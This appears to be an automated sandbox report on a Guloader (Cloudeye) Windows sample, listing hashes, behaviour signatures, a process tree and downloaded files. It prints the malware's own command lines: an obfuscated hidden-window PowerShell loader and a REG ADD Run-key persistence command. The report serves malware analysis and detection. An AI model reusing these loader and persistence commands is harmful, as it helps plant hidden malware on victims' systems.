Analysis
- max time kernel: 121s
- max time network: 123s
- platform: windows7_x64
- resource: win7-20240704-en
- resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
- submitted: 10-07-2024 01:58
Static task: static1
Behavioral task: behavioral1
- Sample: 9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f.exe
- Resource: win7-20240704-en
Behavioral task: behavioral2
- Sample: 9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f.exe
- Resource: win10v2004-20240709-en
General
- Target: 9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f.exe
- Size: 387KB
- MD5: 06e45d2db3c52517fc7139b3b32a4742
- SHA1: 602ab4e85c1506af02d51e144298bac3aea331ca
- SHA256: 9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f
- SHA512: 32e1131c14136721d872ea13736fe7041d8d7e09a1efac363a4bc1d29a9bcd4fcfc8e523cf689386a7e8fe67100194211a1ea9934f7fde5f241df77adcdb61bd
- SSDEEP: 12288:3GqS6hqE06uAyNOcSN6dJjfJ1mPaxm5Bj3O9X:3GqS6hb0Kd4FBcixmBje9
Malware Config
Signatures
- Guloader, Cloudeye
  A shellcode-based downloader first seen in 2020.
- Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Runs PowerShell and hides the display window.
- Adds Run key to start application (2 TTPs, 1 IoCs)
  Processes: reg.exe
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Grshoppens% -windowstyle minimized $nedstemmes=(Get-ItemProperty -Path 'HKCU:\\Ufrugtbarhedens\\').quadricapsular;%Grshoppens% ($nedstemmes)" | reg.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
- Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  Processes: wab.exe
  pid | process
  2924 | wab.exe
  2924 | wab.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  Processes: powershell.exe, wab.exe
  pid | process
  1992 | powershell.exe
  2924 | wab.exe
- Suspicious use of SetThreadContext (1 IoCs)
  Processes: powershell.exe
  description | pid | process | target process
  PID 1992 set thread context of 2924 | 1992 | powershell.exe | wab.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Modifies registry key (1 TTPs, 1 IoCs)
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes: powershell.exe
  pid | process
  1992 | powershell.exe (the same row is recorded 8 times)
- Suspicious behavior: MapViewOfSection (1 IoCs)
  Processes: powershell.exe
  pid | process
  1992 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes: powershell.exe
  description | pid | process
  Token: SeDebugPrivilege | 1992 | powershell.exe
- Suspicious use of WriteProcessMemory (18 IoCs)
  Processes: 9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f.exe, powershell.exe, wab.exe, cmd.exe
  description | pid | process | target process
  PID 2692 wrote to memory of 1992 | 2692 | 9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f.exe | powershell.exe (recorded 4 times)
  PID 1992 wrote to memory of 2924 | 1992 | powershell.exe | wab.exe (recorded 6 times)
  PID 2924 wrote to memory of 2776 | 2924 | wab.exe | cmd.exe (recorded 4 times)
  PID 2776 wrote to memory of 1724 | 2776 | cmd.exe | reg.exe (recorded 4 times)
Processes
- C:\Users\Admin\AppData\Local\Temp\9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f.exe (depth 1, PID 2692)
  Command line: "C:\Users\Admin\AppData\Local\Temp\9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f.exe"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID 1992)
    Command line: "powershell.exe" -windowstyle hidden "$Metabolizable=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Emptyhanded.Sla139';$Kumpan=$Metabolizable.SubString(7195,3);.$Kumpan($Metabolizable)"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Program Files (x86)\windows mail\wab.exe (depth 3, PID 2924)
      Command line: "C:\Program Files (x86)\windows mail\wab.exe"
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\cmd.exe (depth 4, PID 2776)
        Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Grshoppens% -windowstyle minimized $nedstemmes=(Get-ItemProperty -Path 'HKCU:\Ufrugtbarhedens\').quadricapsular;%Grshoppens% ($nedstemmes)"
        - Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\reg.exe (depth 5, PID 1724)
          Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Grshoppens% -windowstyle minimized $nedstemmes=(Get-ItemProperty -Path 'HKCU:\Ufrugtbarhedens\').quadricapsular;%Grshoppens% ($nedstemmes)"
          - Adds Run key to start application
          - Modifies registry key
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 65KB
  MD5: 67cb075314762a89035c6b2b15c68f00
  SHA1: 382134aa018f620cdfbab89a67ae7c10b22e8547
  SHA256: a853d35e1301ceef0526d96852cf8ed766c3d9f04bc5a7b49522b02d1b4302ea
  SHA512: 5677a3b68f751f9cb252d45aa35f4609fe0f81c734b3ed44ddb2acd8e017c371027841892f61a7aa71debe950b2b7ea05ecdbfe577130c69a8d74c74cbaf4190
- Filesize: 325KB
  MD5: b9207704502bf9bc8956ea19f761c559
  SHA1: dee462bb9bff33881c21ce2f8615a222cbb28aa2
  SHA256: ea7565fe3b1b2fa90145b41406c2b175846785ba1be2d0248030dedbdd4aec6f
  SHA512: cba66f601051aaee865574f94996c480873017195c122d750f7355a777359ec0ba05b5f786c88753c7e3b87a01daeae82edba1d3a799e09e28f7ef8bc1f6d704